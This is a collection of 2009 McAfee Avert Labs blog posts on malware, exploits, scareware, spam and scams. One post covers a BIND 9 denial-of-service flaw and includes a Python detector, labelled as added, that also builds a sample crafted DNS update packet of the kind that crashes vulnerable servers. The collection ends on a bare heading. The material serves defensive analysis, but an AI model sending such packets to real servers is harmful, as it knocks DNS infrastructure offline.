    The exploit and lure claim to contain information on the Pakistani Air Force and arrive via email as a PowerPoint document attachment. When an unsuspecting user with a vulnerable version of PowerPoint launches the document, the vulnerability is exploited and the malicious payload is executed.

    The vulnerability lies in a malformed record within the PowerPoint file, which can be exploited to execute malicious code. The shellcode uses the Process Environment Block (PEB) approach to determine the kernel32.dll base address, as shown in the figure below.

    Upon executing the file in a vulnerable version of PowerPoint, the shellcode decrypts itself and executes the malicious binary.

    The malicious PPT file exploits an older vulnerability that Microsoft patched in bulletin MS06-028. This attack is detected with the current DATs as Exploit-PPT.h, and the dropped malicious executable is detected as BackDoor-EFB.

    Inside the Password-Stealing Business

    Today Avert Labs has published a new research paper, “Inside the Password-Stealing Business: the Who and How of Identity Theft.” With so many financial transactions occurring online today, stealing passwords to banks and other accounts is an irresistible attraction for cybercriminals. Thieves around the world use Trojans and other malware to grab user credentials, which they can resell to their crooked clientele while supporting their own illegal businesses.

    Our report uncovers technical details on the capabilities, level of sophistication, and inner workings of the most infamous contemporary password-stealing malware families such as Zbot, Sinowal, and Steam Stealer. We also discuss the prevalence of such malware, distribution channels, how criminals keep up with the changes banks make to keep transactions secure, and how they exploit today’s economic climate. Offering illegal “work at home” opportunities to desperate job seekers is one way criminals lure the unsuspecting into furthering their illegal activities.

    You’ll find our report here in English and eight more languages.

    Want to peek inside another one of these infamous password thieves? Let’s have a look at SilentBanker.

    Our story starts with browser helper objects (BHOs), which are plug-ins for Internet Explorer. BHOs give developers the opportunity to extend the browser’s functionality without having access to the browser’s source code. That doesn’t sound too bad, as users aren’t forced to rely on the browser’s developers to implement new features. Even if you’re not a developer, it seems useful to download any desired extension, whether you want to customize the user interface or read PDF documents directly in the browser, doesn’t it? Well, yes and no! The answer depends on the trustworthiness of the BHO’s author, the server you download from, and the DNS server. Unfortunately, not all BHOs are safe applications—the bad guys are always looking for ways to turn originally useful features into a way to deploy their malware, hunting for usable information such as credentials. Silentbanker is one of those nasty password stealers that comes in the form of a BHO.

    This is one “helper” you don’t want on your side: Once installed and automatically loaded by the browser, Silentbanker can intercept communication between your browser and the Internet! The malware is highly configurable and targets online banking users. Silentbanker will not only recognize and monitor online banking activity but may also modify HTML pages to include additional code or to change a transfer’s details. The data thief acts as a “man in the middle” to inspect and modify data before it is encrypted and sent to a server and after it is received from the server and decrypted. Still think you’re secure with SSL? Unfortunately that’s not the case with this freeloader sitting on top of the browser.

    Silentbanker BHO

    The screenshot above shows a pseudocode representation of Silentbanker’s malicious core. The code is responsible for detouring relevant operating system functions to its own malicious routines. This malware effectively kills security applications such as host intrusion prevention systems and others. Before its own malicious detours are installed, the malware disables any previously installed detours by reading a Windows library’s original code from the hard disk (“read_whole_file”) and then mapping it back into the process’s memory (“remove_API_hooks”)—thus rendering security products that rely on the same technology ineffective.

    Be sure to run McAfee VirusScan and Artemis, and McAfee Gateway Anti-Malware within your corporate network to protect your systems from password thieves.

    Online ‘Monopoly’ a Reminder That Spammers Don’t Play Fair

    In the latest social-engineering tactic targeting online games players, a new spam campaign attempts to lure users into downloading a Monopoly game–though it’s more like a game of Russian roulette. The email is a seemingly innocuous invite from a random user (your first clue that this is something to avoid!). The message uses a subject line such as “Play Online Together” or “Tom has invited you to play Monopoly.”

    If recipients follow the link to monopoly2009.com, they are greeted with a web page that looks fairly well done. It advertises “Monopoly” while giving a brief history of the game and providing some fun facts. It also, of course, encourages users to download the app using several links dispersed throughout the page.

    No code is injected on users’ computers just by visiting the web page. They need to download and install monopoly.exe, which the site delivers. The executable file is just the first stage of the process, however. A fairly common tactic deployed by hackers is that the code installed as a result of the download is only the beginning. At this point the Trojan is activated on the victim’s computer, links to another computer, and downloads the second stage of the malware: the piece that turns the machine into a spam-sending zombie touting Canadian Pharmacy products.

    To help sell the deception, the folks who created the page include a hit counter to suggest that there are people playing the game online right now. Don’t be fooled. This ruse is merely the number of how many people have visited the page thus far.

    Search-Engine Manipulation Evolves as Trust Abuse Grows

    I revisited the topic of search-engine manipulation (a.k.a. blackhat SEO) in two recent posts. Something caught my eye while investigating cases of search-result poisoning–a shift away from tactics used by the attackers earlier in the year.

    Previously, attackers mostly registered free websites to pull off their attacks. They would create a bunch of new sites, cross-link them, and use other tricks to get their pages indexed and ranked high on relevant search result pages (again, largely targeting the most popular search terms of the day, such as those found on Google Trends.) I blogged earlier in the year about how the user forum on democrats.org was leveraged to link a high-ranking site with newly created malicious sites.

    It seems now that attackers are combining various elements of different attacks to achieve blackhat SEO.

    There are currently many examples of high-ranking poisoned results that lead to compromised legitimate sites. This is a bit different from the past, as now security vulnerabilities are being exploited simply for the sake of search-engine manipulation.

    Historically we’ve seen attackers upload malicious content to compromised sites, either directly by injecting exploit code, or indirectly by injecting an iframe or script that brings in exploit code from a remote site. Such situations can lead to site users notifying the compromised site’s administrator that they were attacked while visiting that site. Redirecting victims to a completely different site helps conceal the poisoned site.

    The attackers go a step further by implementing a well-used trick, which is to redirect conditionally. It’s not enough for people to go to a compromised page; they must arrive there from a search-result page. In other words, users (or site admins) navigating to http://compromised-site.com/attacker_created_page will not be redirected to a payload site unless they are coming from a Google search-result page.

    Some of the compromised sites are running older, vulnerable phpBB and WordPress applications. Other sites are serving attacker HTML pages, perhaps as a result of compromised admin/user credentials or misconfigured web servers.

    These events further blur the line between “trusted” sites and malicious content. This trend is likely to continue for years to come.

    Private Jet-Set Network Hacked

    We hear a lot about cybercrime events concerning Facebook or Myspace, but do you know ASmallWorld? It is a private international community for the jet-set crowd and culturally influential people.


    Yesterday the French police force (OCLCTIC), accompanied by FBI agents, arrested two French residents. They were suspected of hacking this social-network platform dedicated to the worldwide upper crust. They allegedly attempted to extort US$1 million from the webmasters to not divulge stolen data.

    Two years ago, a paper named “Asmallworld.net: we have hacked the smartest worldwide website” made some noise in France.

    Whether you mingle with the jet set or in other circles, be careful when you share information on your favorite social network platform!

    Searches for Patrick Swayze Info Could Lead to Malware

    Another celebrity death. Another recycled scareware tactic attempting to lure users to download malware by telling them that their PC is infected with a virus. We saw it after the deaths of Michael Jackson, Farrah Fawcett, and Natasha Richardson earlier this year. Now the attention of cyber criminals has turned to Monday’s death of Patrick Swayze as the soup du jour for malware distribution.

    Queries for information on the death of the popular actor may lead to news stories that look legitimate when returned in search results, but when followed may lead users to a site that looks like this:

    Swayze Spam

    This tactic of presenting a window to the user that looks very much like a legitimate Windows popup has been used many times before in various forms. The Windows Explorer-like screen presented to the user also uses geolocation in an attempt to identify the country and city that the user is coming from, in order to make the user believe that their data is actively under attack. Popups with phrases like “Scan procedures finished.  34 Potential aggressive items was found!” and “Your computer remains infected by threats!  They might lead to data loss and file structure damage, and needed to be heal as soon as possible.  Return to Total Security and download it secure to your PC” also attempt to trick users into believing that the only way they can protect themselves from infection is by downloading bogus security software.

    Clearly scareware tactics are something that cyber criminals have latched onto as a popular method for malware distribution, as it continues to be a recurring and evolving theme. Conficker/Downadup largely popularized scareware with its success (although it wasn’t the first to use it), and now others are riding on that popularity to re-purpose it for their own scams.

    Google Trends Suffering Abuse Today

    Wouldn’t you know it. Just the other day I blogged about rogue anti-virus software makers selectively targeting certain hot search terms. Since then the majority of top terms lead to poisoned links within the top 10-20 search results.

    Recently there have been some news stories about attackers targeting specific topics or terms, but from what I’m seeing they are pretty indiscriminate. It doesn’t matter what the topic is. If people are searching for it, then the bad guys want to poison the results. The speed at which these links appear suggests the operation is largely automated.

    Here’s one example for bengals blackout. One potential way of identifying a bad link is if the title is exactly the same as the search term, it’s in all-capital letters, and the URL contains the search terms as well. The summary usually contains the text you’d expect to find in a news story. This is not a foolproof way to call something bad, but it’s a strong indication that something might be fishy.

    Search safe.

    New Version of McAfee FileInsight

    Today we released the new version 2.1 of McAfee FileInsight. You can download your free copy from the Avert Tools site. FileInsight is a handy integrated tool environment for web site and file analysis. It offers hex editing and syntax highlighting, and comes with several built-in decoders, a built-in calculator, a disassembler, JavaScript scripting support, a Python-based plugin system and much more.

    Let’s go through some stages of an exemplary malware attack to highlight some of its analysis features – but don’t try this stunt at home, unless you know what you’re doing; a safe, isolated lab environment is absolutely mandatory for any such research work.

    The above screen shows the initial malicious web site, which tries to determine your browser and redirect you to one or more exploits of its choice. One of them is an exploit for the Microsoft DirectShow Video ActiveX Control Vulnerability (MS09-032) (stopped as “Exploit-MSDirectShow.b” by McAfee VirusScan and as “BehavesLike.Exploit.CodeExec.EBEO” by McAfee Gateway Anti-Malware).

    Getting to the actual shellcode takes some JavaScript unpacking steps. The JavaScript code is spread over several script files and custom encoded. In the above screen, we take that malicious code into FileInsight’s Scripting window and let it deobfuscate there.

    Once we’re down to the shellcode level, we can directly look at the shellcode in the built-in disassembler. The Disassembler window also features recursive traversal to come up with branch labels automatically.

    It uses a CALL-to-POP sequence to determine the actual memory location of the obfuscated payload, sets up and runs a loop to decode the payload, and then executes it in order to download an XOR-obfuscated executable that turns out to be a UPX-packed backdoor (stopped by Artemis and by McAfee Gateway Anti-Malware as “LooksLike.Win32.Suspicious.C”).

    Advanced users may also want to look into FileInsight’s Python-based plugin system, but be warned: writing plugins with the overwhelming simplicity of the Python language has a certain addiction potential! ;-)

    FileInsight is available here.

    Chinese Pharmacy Spam and Our Monthly Spam Report

    The recent onslaught of “Chinese pharmacy” spam and the DDoS attacks that took down Twitter, Facebook, and others have caused a frenzy of speculation about the Chinese government’s involvement in spam generation and acts of cyberterrorism. McAfee’s September 2009 Spam Report debunks these rumors and gets to the root of the cause.

    The report reveals the truth behind the “Chinese pharmacy” spam:

    • “Chinese pharmacy” spam appears to be the result of a need for regional pharmaceutical companies to offload excess drugs internationally, as selling excess drugs inside the country violates Chinese law. We just don’t believe this month’s onslaught is a sinister government plot.
    • Spam originating from China can often make up between 60 percent and 65 percent of today’s global email volume.
    • “Chinese newsletter” spam emails were the leading type of pharmaceutical spam, with a total of 52,428 emails that contained 1,235 unique URL domains in a single day.
    • If excess drugs in China cannot be sold into the legal market due to Chinese law, then they will continue to be sold on the black market.

    Furthermore, the report uncovers findings that have surfaced since the August 6 DDoS attacks:

    • The August 6 spam campaign, launched in conjunction with the DDoS attacks, was not solely responsible for the downfall of the social networking sites and, in fact, was likely a mere afterthought of the attacker.
    • The August 6 DDoS and spam attack was intended to target a pro-Georgian blogger, and was likely part of an intimidation campaign in retaliation for his political blogs.
    • Brazil, Turkey, and India were the top three countries from which infected machines spread the August 6 spam campaign in conjunction with the DDoS attack.

    Check out the full report here.

    Searching for Malware Data Likely to Lead to More Malware

    It’s been a while since I blogged about Google Trends being abused to serve malware. However, recent attention around Google search poisoning led me to check on things. It seems the attackers are being more selective in the search terms they target–favoring those that have something to do with computer security. Hunting for poisoned search results based on random hot-search terms is hit or miss (and more miss than hit, at least in the top 10 results being poisoned). But terms that contained virus, trojan, rogue, and bulletin all led to poisoned top search results. Some even led to pages and pages of bogus links, which redirect to rogue anti-virus malware.

    The following image is not intended to show the actual text of the search results, but rather it highlights the fact that four out of the top fifteen results are poisoned for one of today’s most searched terms at the time of this writing:

    Starting from result number 20, the situation gets much worse–with dozens of poisoned results:

    Granted, the link names on the second batch of results have nothing to do with the trojan search term I used. However, the attackers have set up thousands of pages that cross-link to each other, and contain various hot-search terms and content. So even if the long tail of poisoned results on any search term has a low conversion rate for that term, it can still serve to boost the score of other pages and terms that have a higher conversion rate.

    Once a search user takes the bait, it’s business as usual for the attackers:

    Graphic displayed while web page loads

    Bogus warning message displayed from web page

    Simulated system scan displayed from web page

    Bogus scan results displayed from web page

    Confidence Scams

    I always get a lot of questions about confidence scams.  These types of spam emails have been around almost as long as email has been available to the public.  Confidence scams are a child of phishing scams, and the annoying little brother of lonely girl scams, always showing up at the wrong time or hiding just around the corner.  They’re difficult to eliminate completely because they are always re-inventing themselves. 

    Confidence scams, like lonely girl scams, are attempting to relieve a target of their money by convincing them to give it up willingly for a cause.  They can appeal to the compassionate heart by asking for help with an orphanage, or to a baser greed by asking for help smuggling money out of a country.  

    The emails themselves are generated by a sweatshop of workers who create an account on a free email website, fill in a vague template with plot points, and then send it off to random recipients.  A different Reply-To field is set in order to redirect any replies to another free email account, which exists solely for the purpose of receiving the replies (the scammer assumes that the newly created sending account will be revoked for its spamming). 

    Often confidence scams will attempt to validate themselves by linking to a news website or referencing a story that has been in the news.  Take this example:

    The article it links to is a real article about a real story.  It intrigues the mind with the possibility of winning the lottery, and, combined with a belief that anything can happen during a war, or that America’s soldiers are as corrupt as Hollywood cinema portrays them, it might lead one to believe that the grain of truth in this scam extends beyond the BBC article.

    Here is another snippet from a confidence scam that is actually based more in the realm of fact than the last one:

    As unbelievable as it may sound, a web-search reveals the story is actually taken from a New York Times article:  http://www.nytimes.com/2007/10/07/world/africa/07congo.html

    Confidence scams can range from a sentence to a couple pages of text.  Though not all confidence scams fit the following outline, it generally covers what we expect to see in a confidence scam:

    1.  A generic greeting/intro
    2.  A tragedy or plotline
    3.  A far-away location
    4.  Eagerness to do a financial transaction
    5.  Promises of compensation/reward
    6.  Providing alternate means of contact / confidence

    Many people recognize confidence scams when they see them.  They tend to range from annoying to amusing.  The target audience for these scams is usually the older generation of people who are less familiar with technology and email and are more likely to believe that modern financial transactions are still performed with a check or money order.  As the target audience is generally retired, they are often using free email accounts, which are not protected from spam to the same degree as enterprise-level corporate accounts. 

    Children who fear their aging parents could fall into this trap might consider creating an account for them on a social networking site, locking it down to prevent messages from non-friends and linking the alerts to the child’s email address.

    Prepare for the new upcoming 2010 AV products.

    Many major security companies are about to release their new retail products for 2010. Expect some comparative reviews in the coming months; check what you need and stay protected.

    Some ‘2010’ products are already out on the web, but unfortunately most of them are FakeAlert Trojans or Scareware.

    Once downloaded, you see pop-up windows alerting you about malware found on your machine and asking you to buy the product. The actual problem is the software you just executed.

    We have reported on FakeAlert Trojans before – you may remember some products named:

    - “Virus Remover 2007”
    - “Win AntiSpyware 2008”
    - “AntiVirus VIP”
    - “AntiSpyware Pro2009”
    - …

    Those are just a few; now let’s look at this “2010” example:

    Screenshot of Fakealert Webpage

    Before you think about buying a new product or testing a trial version, you should:

    - Use McAfee SiteAdvisor to get a rating of the page you’re looking at.
    - Type the product name into your favorite search engine and have a look.
    - Check comparative reviews – don’t believe in the awards posted on the page.
    - Still unsure? Go to the nearest store and buy a box. There are no FakeAlert products available as boxed software in a store. They sell online only.

    If you are already running an anti-virus product from a known vendor and you get annoyed by popups or bogus alerts, or have a different issue, contact that vendor’s technical support first.

    Quote from the bottom of the screen:

    According to security experts, most spyware types are not detected by antiviruses because they are disguised as legitimate software installed with the user’s consent.

    Actually, ‘PC Antispyware 2010’ is a perfect example of such “malicious software disguised as legitimate software”.

    Of course, we and other major security companies do add detection for those FakeAlert products as Trojans.

    McAfee SiteAdvisor rates this page as RED.
    McAfee VirusScan detects the installer as Generic FakeAlert.d!gen
    McAfee Secure Gateway detects Trojan.Dldr.FraudLo.sxm

    Brazilian Malware Writers Stumble Again

    I like to pick on malware writers, especially the dumb ones as you can see here. Sometimes they’re just too big a target to ignore.

    The latest round is with Brazilian malware writers again. As you are aware, some days ago the Delphi virus was discovered; we detect it as W32/Induc. So today I got a Brazilian PWS-banker malware that was infected with–guess what?–the W32/Induc Delphi virus! What an irony. :)

    Back in 2007, I wrote about something quite similar here. And, surprise, it was another Brazilian PWS-banker malware.

    So, please, malware writers, repeat after me: “I must install anti-virus software. I must install anti-virus software.”

    Today, you can buy a customized Brazilian PWS-banker malware for about US$50. That may explain why it is so cheaply made. :)

    Journal: Emerging Standards, Technology Will Relieve Audit Fatigue

    There is a light at the end of the tunnel—risk and compliance technologies and standards are relieving auditors and businesses in this age of increased electronic accountability. On the heels of our integration of SolidCore’s technology, researchers from McAfee Avert Labs have laid out the compliance challenges facing organizations, and the new standards that can save thousands of hours, in the latest edition of the McAfee Security Journal.

    Organizations Suffer from Audit Fatigue

    Of the many compliance obstacles facing organizations, the sheer volume of audits is perhaps the most oppressive impediment to returning to “business as usual.” With more than 400 separate sets of requirements facing organizations internationally, global institutions can face more than 40 diverse mandates. Failure or noncompliance is not an option, as reputational damage and the penalties levied by regulatory agencies can have severe financial consequences for businesses.

    In a McAfee-sponsored survey, one organization estimated that to prepare for their PCI audit, the company spent 1,000 hours in one week to configure audit settings. Another organization spent more than 18,000 hours to prepare for external audits in one year. Even when faced with such overwhelming compliance demands, more than 51 percent of organizations surveyed still used spreadsheets to execute audits.

    Three Steps to a Better Audit

    Organizations that embrace IT as the path to solving compliance issues should follow three key steps to combat audit fatigue:

    1. Establish a governance committee: By connecting executives with operational realities, a governance committee can help focus compliance spending where it will be used to its fullest
    2. Automate the IT audit process: By investing in risk evaluation and auditing technology, companies can automate the vast majority of once-manual, time-consuming tasks, better ensuring ongoing compliance and reserving IT energy and spending for strategic priorities
    3. Adopt a well-built framework: By adhering to a consistent framework throughout an organization, IT can consolidate the number of separate audits it must conduct

    SCAP Leads the Way in Next-Generation Audit Standards

    The emergence of the Security Content Automation Protocol (SCAP) signals a change in traditional risk and compliance architecture. Using SCAP-compliant products, companies can now eliminate the need for vendors to issue updates when new policy or regulatory mandates are decreed. By immediately integrating changes in policy, SCAP improves vulnerability detection, asset management, risk monitoring and response, threat publishing, and more. As more technologies support evolving audit demands and infrastructures, the audit process will become increasingly automated.

    To learn more about McAfee’s insights into the status of risk and compliance technologies, read the newest edition of the McAfee Security Journal.

    Spammers Broadcast It for FREE!

    “FREE” is by far the most commonly used term in spam mails. The word free is such a striking term that any layman, without knowledge of these tricks of the trade, can fall into the trap of disguised mails sent by spammers.

    Here are a couple of the most often used sentences in spam mails:

    •  We are letting you try it for FREE, you just pay the shipping costs!
    •  FREE Download without limits!
    •  Get your Free Trial Now!
    •  Take FREE exotic vacations!
    •  Get Free trial bottle!

    This barrage reminds me of the maxim “appearances can be deceiving.” This adage becomes true in a scenario in which an innocent user falls prey to these eye-catching spam mails and then regrets it later.

    Coming back to the main topic of broadcasting for “free,” we are observing a trend wherein spammers abuse social networking websites quite frequently by creating fake accounts to host spam.

    The most common trend these days is spammers inserting spoofed URLs associated with social networking and social bookmarking sites such as Blogspot, Yahoo Groups, and Google Groups to host porn, health, replica watches, acai power slim, and many other categories of spam on them. Thus it becomes a big challenge for these social networking sites to moderate any abusive or spammy messages on their networks.

    A recent and classic example of how the bad guys (spammers) take advantage of some really cool features provided by these networking websites will leave you amazed. Have a look at the following sample, which will give you a better understanding of these types of spam mails.

    Sample 1

    “Get your Free Trial Now” is a hyperlink to “google.com/reader/view/user/…” Clicking it will redirect you to the web page, where the spammer has created a fake profile on social networking websites. The actual spam is in the form of an image that is again hyperlinked to the main spam website. Basically the spammers have abused the “sharing items” feature to their advantage and are spreading spam.

    The sharing-items feature lets you share all your reading-list contents with the public.

    Why is the spammer using a different approach altogether rather than simply placing the spam URL in the mail?

    It’s very easy for anti-spam filters to cut out mails with URLs that have been recently created and are hosting spam. An example of this would be URLs with .cn domains, which host meds spam most of the time.

    Due to a seeming inability to filter and remove their content, spammers abuse social networking websites far more than any other free web-hosting site. We advise our customers to be cautious about such mails and refrain from clicking any URLs in them.

    We’ll finish with some more typical examples of how spam looks on social networking websites.

    Pharmacy

    Sample 2

    Replica Watches

    Sample 3

    Acai Power Slim

    Sample 4

    Scammers Love Your Money

    We generally classify email messages pretending to be from a family member of an (often African) dignitary or from a desperate young woman as scams. In the first case, the sender sometimes explains that following the death of an influential dignitary a large sum of money is blocked in a bank account somewhere. With the recipient’s help and financial backing for a money transfer, the sender says, it would be possible to release the money. Substantial compensation is offered to whoever agrees. In the second case, the unknown beauty befriends the victim and suddenly has a terrible money problem.

    For some individuals, these swindles, called advance fee fraud (also known as 419 fraud) and romance scams, are a primary source of revenue. They also employ lottery and fake prize scams.

    In Eastern Europe senders remain discreet and hide their wealth. But in some African countries such as the Ivory Coast, many crooks work openly. After reading a news item on this subject at the France24 observers web site, I searched the French Skyrock social networking platform and discovered photos and videos from their exploits. Each crook has his own blog entries and is attached to a gang web page where each member is listed in a friends list. They are plenty boastful. Among the group names, we have:

    • les banquiers arabes (the Arab bankers)
    • la banque africaine (the African bank)
    • les boucantiers de la Cote d’Ivoire (the Ivory Coast boucantiers)
    • les plus riches (the richest)
    • etc.

    Here is one example:

    According to 419 AFF, losses from advance fee fraud in 2007 by companies and individuals reached US$4.3 billion.

    In France, one naive victim recently lost €1 million!

    Last year, Janella Spears of Oregon is reported to have lost $400,000 (£270,000) after falling under the spell of one such criminal. Here is her account:

    The naive are numerous, and cybercriminals know it. We must remain vigilant.

    Collateral Damage (continued)

    While Dmitri Alperovitch wrote his blog entry about the recent DDoS attack against Twitter and some other platforms hosting accounts of a pro-Georgian blogger nicknamed cyxymu, I browsed the Internet, searching for malicious websites taking advantage of this topic.

    The second result of my Google search was a link proposing to add the blogger as a friend. This link was a lure that redirected me to a site promoting a fake anti-virus product.
    Once again, we did not have to wait long before encountering such sites taking advantage of the news.

    Collateral Damage

    Twitter, LiveJournal, Facebook, YouTube, Fotki–what do they have in common? They all hosted an account of a pro-Georgian blogger who went under the nickname cyxymu (taken after Sukhumi, the capital of Abkhazia, one of Georgia’s pro-Russian breakaway republics and the city he professed to flee from in 1993 during the republic’s war with Georgia). And they all suffered a distributed denial-of-service (DDoS) attack during the course of the day yesterday, an attack that was able to take down Twitter for several hours and significantly slow down connectivity to Facebook. Reportedly, the attack packets sent to the targeted social-media sites were requests to fetch the pages hosted for this user, who had just a few days ago blogged about the upcoming one-year anniversary of the war between Georgia and Russia.

    In addition to the web-based DDoS attacks, McAfee’s TrustedSource reputation system had also detected a spam campaign that referenced the targeted blogs. We believe this campaign had a dual purpose. On one hand, the attackers spoofed the email address of the blogger, which is hosted on Gmail, as the originator of the spam. As a result, the blogger’s inbox was flooded with out-of-office notifications and vacation bounces automatically sent by mail clients of people who had received this spam. This was likely part of an intimidation campaign designed to send a message to cyxymu about who was the real intended target of the DDoS. In addition, the spam contained links to the blogger’s sites, with the likely goal of bringing even more traffic to bear on the servers of those blogs than would already be caused by the DDoS. 

    Screenshot of the spam bounces in cyxymu’s mailbox that he had posted after the attack on abkhaziya.net, one of his backup blog sites

    In our analysis, the spam appears to have been distributed, at least partially, by the same botnet as the one that was used for the DDoS. Of the infected machines spreading the spam, 29 percent were located in Brazil, 9 percent in Turkey, and 8 percent in India.

    We detected two distinct spam runs that began around 8 a.m. EDT on Thursday, August 6 and started winding down around 11 a.m. the same day, with the last messages being detected at 4 p.m. Only the second spam run, the larger of the two, spoofed cyxymu’s email address, while the first one randomized the senders’ email addresses.


    URLs that were attacked include:

    http://twitter.com/cyxymu
    http://www.youtube.com/Cyxymu
    http://www.facebook.com/cyxymu
    http://cyxymu.livejournal.com
    http://cyxymu1.livejournal.com
    http://fotki.com/cyxymu

    The IP addresses included in the attacks were detected proactively by McAfee’s TrustedSource as having a malicious reputation.

    Remote BIND 9 DoS Vulnerability Patched

    A new, remotely exploitable denial-of-service (DoS) vulnerability affecting BIND Version 9 was reported by ISC on July 28. It’s also reported that exploits have been seen in the wild.  Because BIND is so widely used, these attacks can affect a great deal of critical infrastructure. Here’s a short description of the problem.

    The vulnerability exists in the handling of the DNS dynamic-update request message. Dynamic update (RFC 2136) was added to DNS to deal with DNS records that change constantly across various DNS servers. Individual DNS servers can send update messages back to the DNS zone master so that the master record remains current. Each update message should contain at least a zone record, a prerequisite record, and an update record. The zone record specifies which zone the update message is for; only the zone master can update the record for itself. The prerequisite record specifies the condition the server should check before applying the update, and the update record contains the updated record.

    An example configuration of a set of DNS servers for a particular zone.

    The vulnerability that was reported yesterday exists due to improper handling of a specially crafted DNS dynamic-update query. Two conditions in the update query must be met for the packet to trigger the vulnerability: the victim’s DNS server must be the master of the zone specified in the update query packet, and the update query packet must contain a prerequisite record with the type “ANY.” ANY is not expected in any resource record because it’s defined only as a question type. The victim’s DNS server cannot handle this condition and shuts itself down. The attacker can cause a denial of service on the vulnerable DNS server with just one UDP packet. In fact, the attack will succeed even if dynamic update is disabled on the victim’s DNS server.

    Patches are available from ISC for BIND Versions 9.4.3-P3, 9.5.1-P3, and 9.6.1-P1. Users and administrators should apply these patches immediately because the exploit is public.

    McAfee Network Security Platform detects this attack using the signature set released on July 30 with the signature “DNS: ISC BIND 9 Dynamic Update Denial-of-Service Vulnerability.”
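    To make the two conditions concrete on the wire, here is an added Python example (not BIND, ISC or McAfee code, and not the Network Security Platform signature itself) that parses the header, zone and prerequisite sections of an RFC 2136 UPDATE message, including compressed names, and flags a TYPE=ANY prerequisite in a message aimed at a zone this server masters. The zone example.test. and the sample messages are constructed for the demo.

```python
"""Parse DNS dynamic-update (RFC 2136) messages and flag TYPE=ANY prerequisite RRs.
Added example, not BIND or McAfee code; the sample messages below are constructed."""
import struct

OPCODE_UPDATE = 5
TYPE_A, TYPE_SOA, TYPE_ANY = 1, 6, 255
CLASS_IN, CLASS_ANY = 1, 255


def read_name(msg, off):
    """Decode a possibly compressed domain name; return (name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                 # 2-byte compression pointer
            if end is None:
                end = off + 2                     # name continues elsewhere; resume here
            off = struct.unpack_from(">H", msg, off)[0] & 0x3FFF
            hops += 1
            if hops > 32:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels) + ".", (off if end is None else end)


def read_rr(msg, off):
    """Parse one resource record as laid out in the prerequisite/update sections."""
    name, off = read_name(msg, off)
    rtype, rclass, ttl, rdlen = struct.unpack_from(">HHIH", msg, off)
    off += 10
    rr = {"name": name, "type": rtype, "class": rclass, "ttl": ttl,
          "rdata": msg[off:off + rdlen]}
    return rr, off + rdlen


def parse_update(msg):
    """Parse the header, zone and prerequisite sections of an update message."""
    ident, flags, zocount, prcount, upcount, _ = struct.unpack_from(">HHHHHH", msg, 0)
    off, zone = 12, None
    if zocount == 1:                              # RFC 2136 allows exactly one zone entry
        zname, off = read_name(msg, off)
        ztype, zclass = struct.unpack_from(">HH", msg, off)
        off += 4
        zone = {"name": zname, "type": ztype, "class": zclass}
    prereqs = []
    for _ in range(prcount):
        rr, off = read_rr(msg, off)
        prereqs.append(rr)
    return {"id": ident, "opcode": (flags >> 11) & 0xF, "zone": zone,
            "prereqs": prereqs, "upcount": upcount}


def flag_any_prerequisite(msg, zones_mastered):
    """Return prerequisite RRs of type ANY in an UPDATE for a zone this server masters.

    Caveat: RFC 2136 section 2.4.4 ("name is in use") legitimately encodes a
    prerequisite as CLASS=ANY, TYPE=ANY, RDLENGTH=0, so hits are triage input,
    not proof of an attack.
    """
    parsed = parse_update(msg)
    if parsed["opcode"] != OPCODE_UPDATE or parsed["zone"] is None:
        return []
    if parsed["zone"]["name"] not in zones_mastered:
        return []
    return [rr for rr in parsed["prereqs"] if rr["type"] == TYPE_ANY]


def encode_name(name):
    """Wire-encode an uncompressed domain name."""
    labels = [lab for lab in name.rstrip(".").split(".") if lab]
    return b"".join(bytes([len(lab)]) + lab.encode("ascii") for lab in labels) + b"\x00"


def build_update(zone, prereqs, ident=0x1234):
    """Build an UPDATE with one zone entry, the given prerequisites and no update RRs.

    Each prerequisite is (name_bytes, type, class, rdata); name_bytes may carry a
    compression pointer (0xC00C points at the zone name, which starts at offset 12).
    """
    header = struct.pack(">HHHHHH", ident, OPCODE_UPDATE << 11, 1, len(prereqs), 0, 0)
    body = encode_name(zone) + struct.pack(">HH", TYPE_SOA, CLASS_IN)
    for name_bytes, rtype, rclass, rdata in prereqs:
        body += name_bytes + struct.pack(">HHIH", rtype, rclass, 0, len(rdata)) + rdata
    return header + body


HOST_PTR = b"\x04host\xC0\x0C"                    # host.<zone> via compression pointer
# Ordinary "RRset exists (value dependent)" prerequisite: host has A 192.0.2.10.
SAMPLE_LEGIT = build_update("example.test.", [(HOST_PTR, TYPE_A, CLASS_IN, bytes([192, 0, 2, 10]))])
# Prerequisite of TYPE ANY, the message shape the post describes as stopping BIND 9.
SAMPLE_ANY = build_update("example.test.", [(HOST_PTR, TYPE_ANY, CLASS_ANY, b"")])
```

    One caveat the post does not mention: RFC 2136 section 2.4.4 defines a legitimate “name is in use” prerequisite with CLASS=ANY and TYPE=ANY and an empty RDATA, so a hit from this rule is a triage signal for the zone’s master rather than proof of an attack.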

    Counting Badness

    Following up on the recent post by my colleague Dave Marcus concerning malware growth, the guys from AV-Test in Germany just released their updated stats. To avoid confusion when comparing the different numbers, here’s a quick explanation of the different counts:

    AV-Test counts unique binaries. Unique means different cryptographic hashes. So the same Trojan, obfuscated with 10 different packers, results in 10 unique binaries. This is often due to the impact of server-side polymorphism, where you get a unique binary every time you download a file.

    Our outbound counting, as used by Marcus, counts the threats for which we have to create a driver for detection. If in the example above we are able to look beneath the obfuscation layer of the packers, the 10 different binaries would be counted as just one Trojan. In addition to that, we frequently use generic detection, in which a single count could hit on thousands of minor variants.

    Now that the different ways of counting may be a bit clearer, let’s look at the bad news:

    AV-Test’s count has come close to 22,000,000 samples in June.


    This by itself is disturbing, but the really disturbing trend is visible when we look at the growth month over month:


    The growth had been fairly constant over the last year, but this has changed now.

    We are now seeing a major increase in the monthly growth, topping one million new samples each month in AV-Test’s count. And this time it’s not only samples (the same piece of malware packed over and over again) but also actual new malware. Marcus’ numbers point the same way: growth in 2009 has nearly tripled compared with 2008, and remember that we count malware rather than samples. This indicates there has been a recent shift in malware production: tons of new Trojans have been developed and released on top of the reused stuff.

    So keep your machine updated, not just AV and the OS but all applications. Watch out where you surf. (SiteAdvisor may help you there.) And take care what links or attachments you trust in emails and all other forms of messages. All this will help you enjoy the summer!

    New Zero-Day Attacks Use PDF Documents

